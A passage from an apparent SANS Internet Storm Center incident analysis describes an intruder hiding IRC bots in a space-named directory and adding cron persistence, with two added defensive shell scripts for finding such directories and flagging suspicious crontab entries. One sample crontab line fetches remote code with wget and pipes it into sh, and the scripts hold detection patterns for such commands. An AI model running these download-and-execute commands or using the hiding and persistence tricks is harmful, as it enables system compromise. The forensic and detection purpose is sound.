We are not quite sure whether any of the above exploits was successful. The id command, or the exploit itself, would have told the attacker whether he got lucky, but there aren't any traces in the shell history file that would tell us either way.
In any case, Phase #3a follows: the attacker installs some goodies. virus.tar isn't really a virus; it is a copy of EnergyMech, an IRC bot. Note how the bad guy uses nano to edit the config file, which suggests that he isn't all that experienced on Unix: a seasoned Unix hacker would more likely use vi, because vi is present on every Unix flavor and version. Note also how he calls the IRC bot "Evolution" when he starts it, likely hoping that an admin would overlook it in a casual look at the process list.
/sbin/ifconfig -a | grep inet
tar xvf virus.tar
rm -rf virus.tar
chmod +x *
Phase #3b: install some more goodies. egg.tgz is a copy of Eggdrop, another IRC bot. Note how the bad guy puts the files into a directory whose name is a single space, which is easy to overlook in an ls listing. If you want to search for such directories on your system, try this (as root):
# find / -type d -name " "
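The single-space name is only one member of a family: intruders also use ". ", "  " (two spaces), "..." and similar names that look like nothing in a directory listing. The following script is an added example, not part of the original diary, that generalizes the find above to any directory whose name consists only of whitespace and dots, excluding the legitimate "." and "..". It assumes a POSIX sh with find, grep and sed, and builds a constructed sample tree under a temporary directory so it can be run offline.

```shell
# Added example (not from the ISC diary): hunt for directories whose names
# consist only of whitespace and/or dots (" ", ". ", "...", "  "), the
# "invisible" hideouts used by the intruder. POSIX sh; find, grep, sed only.

# Print every directory under $1 (default /) whose basename is made only of
# spaces, tabs or dots. "." and ".." themselves are filtered out; anything
# else in that class deserves a look by hand.
find_hidden_dirs() {
    root="${1:-/}"
    find "$root" -type d 2>/dev/null \
        | grep -E '/[[:space:].]+$' \
        | grep -v -E '/\.\.?$'
}

# Build a constructed sample tree (assumption: a writable temp dir exists)
# mixing three hideouts with two legitimate directories, for a self-test.
# Prints the path of the tree's root.
build_sample_tree() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/var/tmp/ "            # single space, as in the diary
    mkdir -p "$tmp/home/user/. "         # dot-space
    mkdir -p "$tmp/usr/lib/..."          # three dots
    mkdir -p "$tmp/home/user/normal"     # ordinary directory, must not match
    mkdir -p "$tmp/home/user/.ssh"       # legitimate dotdir, must not match
    printf '%s\n' "$tmp"
}

# Number of hideouts found under $1.
count_hidden_dirs() {
    find_hidden_dirs "$1" | wc -l | tr -d ' '
}

# Stand-alone run: build the tree, list hits with trailing whitespace made
# visible (sed's l command marks the end of each line with $), clean up.
sample=$(build_sample_tree)
find_hidden_dirs "$sample" | sed -n l
rm -rf "$sample"
```

On a live system run `find_hidden_dirs /` as root; the grep-based filter is line oriented, so a directory name containing a newline would slip past it, but that is rare enough to accept for a first sweep.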
tar zxvf egg.tgz
rm -rf egg.tgz
chmod +x *
./eggdrop -m bot1.conf
Phase #4: The attacker wants to make sure that access can be regained, and edits the crontab so that some of his processes are restarted automatically on a schedule.
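When checking a box for this kind of persistence, the crontab of the compromised account is only the first place to look; system-wide tables and every other user's spool file matter too. The script below is an added example, not part of the original diary: it reads crontab text, drops comments and variable settings, and flags job lines that start something from /tmp, /var/tmp or /dev/shm, that reference a path component made of whitespace or three or more dots (like the " " directory above), that name the two bots from this diary, or that fetch code over the network and pipe it into a shell. The cron locations listed are the usual Linux and BSD ones and are an assumption to adjust for your platform; the sample crontab is constructed for the demonstration.

```shell
# Added example (not from the ISC diary): review cron entries for the kind
# of restart persistence described above. POSIX sh; grep, sed, find only.

# Where cron jobs usually live (assumption: common Linux/BSD layouts; adjust
# for your platform). The spool dirs hold one file per user.
CRON_LOCATIONS="/etc/crontab /etc/cron.d /var/spool/cron /var/spool/cron/crontabs"

# Read crontab text on stdin, skip comments, blank lines and VAR=value
# settings, and print every job line whose command looks suspicious:
#   - runs something from /tmp, /var/tmp or /dev/shm
#   - has a path component containing whitespace, or of three or more dots
#     ("/ /", "/. /", "/.../"); plain "/./" and "/../" are left alone
#   - names the bots seen in this diary (eggdrop, emech/energymech)
#   - downloads with wget/curl or pipes into a shell
flag_cron_lines() {
    grep -v -E '^[[:space:]]*(#|$)' \
        | grep -v -E '^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' \
        | grep -E -i \
            '(^|[[:space:]])(/tmp|/var/tmp|/dev/shm)/|/([[:space:].]*[[:space:]][[:space:].]*|\.\.\.+)/|eggdrop|emech|energymech|wget|curl|[|] *(ba)?sh'
}

# Walk the standard locations and flag entries from every file found,
# prefixing each hit with the file it came from. Run as root.
audit_system_cron() {
    for loc in $CRON_LOCATIONS; do
        [ -e "$loc" ] || continue
        find "$loc" -type f 2>/dev/null | while read -r f; do
            flag_cron_lines < "$f" | sed "s|^|$f: |"
        done
    done
}

# Constructed sample crontab: two legitimate jobs plus three entries in the
# style of the intrusion above (paths with a single-space component, the
# bots started from there, and a download-and-run job).
SAMPLE_CRONTAB='# m h dom mon dow command
SHELL=/bin/sh
0 3 * * * /usr/bin/updatedb
*/10 * * * * /var/tmp/ /emech -c /var/tmp/ /evolution.conf >/dev/null 2>&1
@reboot cd /home/user/. / && ./eggdrop -m bot1.conf
30 6 * * 1 /usr/local/bin/backup.sh
* * * * * wget -q -O - http://example.invalid/x | sh'

# Number of flagged lines in the constructed sample.
count_flagged() {
    printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_lines | wc -l | tr -d ' '
}

# Stand-alone run over the sample; use audit_system_cron on a real host.
printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_lines
```

The pattern list is deliberately loose: on a real host expect a few false positives (a backup job that stages files in /tmp, say), which is cheaper than missing a restart entry for a bot parked in a directory named " ".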
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.